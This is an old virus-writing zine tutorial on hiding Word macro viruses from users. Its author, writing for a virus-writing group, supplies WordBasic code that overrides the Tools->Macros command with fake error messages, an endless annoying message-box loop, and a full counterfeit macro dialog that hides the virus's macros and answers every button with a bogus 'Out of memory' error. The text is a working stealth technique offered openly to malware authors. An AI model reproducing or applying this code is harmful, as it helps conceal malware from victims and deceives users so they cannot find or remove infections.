Serialkiller's
Macro Virus Tutorial
- Simple
Stealth -
I will show you two ways to hide macros in a virus. First I will explain
a simple routine to hide macros. However the second one is a more effective
way to hide a macro.
1. All you have to do is make a macro with the name "ToolsMacro".
Normally it will already exist in WinWord. Erase all lines and
at the beginning type "SubMain" (All macros beginning with this
command), and at the end type "EndSub" (All macros end with this
command).
Here is some example code which shows how your ToolsMacro macro could
look like:
SubMain
MsgBox "Illegal function in modul 0xCB15C001",32
FileExit
EndSub
-> SubMain
-> The beginning of the macro
-> MsgBox "Illegal function in modul 0xCB15C001",32
-> Display a messagebox with some fake error message.
-> Number 32 stands for the symbol which is displayed on the left
-> side of the message box, in this case it is a "!"
-> FileExit
-> Closes the current opened file
-> EndSub
-> The end of this macro
Whenever the user clicks on "Tools" followed by "Macros" the new
ToolsMacro macro will activate, show him some error message and close
the currently opened file.
He will not get to see the macros (your virus).
Here is another, rather annoying ToolsMacro routine :)
Sub MAIN
Terror:
MsgBox "Hi", 32
Beep
Goto Terror
End Sub
About the symbols,
you can change the symbols if you type another number at the end of the
line in which you call MsgBox.
For example:
MsgBox"Hi",32
... where the last part (32) represents the symbol.
If you run the macro it will show you a message box with an "!" on it.
Here are the codes for the symbols:
16 stands for a cross red circle with "OK"
17 stands for a cross red circle with "OK" and "Cancel"
18 stands for a cross red circle with "Abort","Retry" and "Cancel"
19 stands for a cross red circle with "Yes","No" and "Cancel"
20 stands for a cross red circle
32 stands for a "!"
34 stands for a "?" with "Abort","Retry" and "Ignore"
37 stands for a "?" with "Retry" and "Cancel"
48 stands for a "!" with "OK"
49 stands for a "!" with "OK","Cancel"
50 stands for a "!" with "Abort","Retry" and "Ignore"
51 stands for a "!" with "Yes","No" and "Cancel"
52 stands for a "!" with "Yes","No"
53 stands for a "!" with "Retry","Cancel"
64 stands for a "I" with "OK" --> I = "Information"
66 stands for a "I" with "Abort","Retry" and "Cancel"
67 stands for a "I" with "Yes","No" and "Cancel"
68 stands for a "I" with "Yes","No"
69 stands for a "I" with "Retry" and a "Cancel"
2. Here is the 2nd way to hide a macro.
This routine is used in many viruses, like in MooNRaider, its a far more
effective way to hide a macro. Most of the users will not notice that they
have a macro virus on their computer.
What this will do is generate a total new Tools -> Macros Dialogbox,
but one without the macros. ;-)
Here is the code:
Sub MAIN
B$ = "Out of memory." ;it will show at all buttons, except "Cancel"
C$ = "WordBasic Err = 7" ;is the heading
Dim ComboBox1$(0) ;make the macro box
ComboBox1$(0) = "" ;will show NOTHING in the "macro Name" box
Dim ListBox1$(0) ;make the macro contents box
ListBox1$(0) = "" ;will show nothing in the macro contents box
Dim DropListBox2$(0) ;make the list box
DropListBox2$(0) = "Normal.dot(Global Template)" ;the list box will show
;Normal.dot (Global Template)
A:
Begin Dialog UserDialog 442, 320, "Macro" ;make the heading from the box "Macro"
CancelButton 290, 38, 141, 21 ;make the "Cancel" and the "Record" button
PushButton 290, 14, 141, 21, "Rec&ord...", .D2 ;make the "Record" button
PushButton 290, 72, 141, 21, "&Run", .D3 ;make the "Run" button
PushButton 290, 97, 141, 21, "&Create", .D4 ;make the "Create" button
PushButton 290, 125, 141, 21, "&Delete", .D5 ;make the "Delete" button
PushButton 290, 161, 141, 21, "Or&ganizer...", .D6 ;make the "Organizer" button
ComboBox 7, 23, 269, 194, ComboBox1$(), .ComboBox1
Text 6, 223, 93, 13, "Macros &Available In:", .T1
Text 7, 259, 109, 13, "Description:", .T2 ;is the heading in the last box "Description"
Text 7, 7, 93, 13, "&Macro Name:", .T3 ;is the heading in the first box "Macro Name:"
ListBox 7, 276, 425, 38, ListBox1$(), .LB1 ;list it inb the box
DropListBox 6, 238, 425, 19, DropListBox2$(), .LB2 ;make the blank field under "Macros"
End Dialog ;end dialog
Redim dlg As UserDialog
x = Dialog(dlg)
Select Case x ;select button
Case 0 ;
Cancel ;
Case 1 ;
MsgBox B$, C$, 48 ;
Goto A ;will take the user back to the box "ToolsMacro"
Case 2 ;
MsgBox B$, C$, 48 ;
Goto A ; by ALL other buttons
Case 3 ; you will get the error
MsgBox B$, C$, 48 ; message "OUT of MEMORY"
Goto A ; and you will get on the
Case 4 ; "ToolsMacro" box again
MsgBox B$, C$, 48 ;
Goto A ;
Case 5 ;
MsgBox B$, C$, 48 ;
Goto A ;
End Select ;end select
End Sub ;end of the macro
I hope this helped you to make your viruses a bit harder to notice by the
average user :) If you have question please feel free to write to me.
In our next mag I will show you how polymorphism works in word macros :-)
--Serialkiller [Codebreakers]
xxserialkillerxx@hotmail.com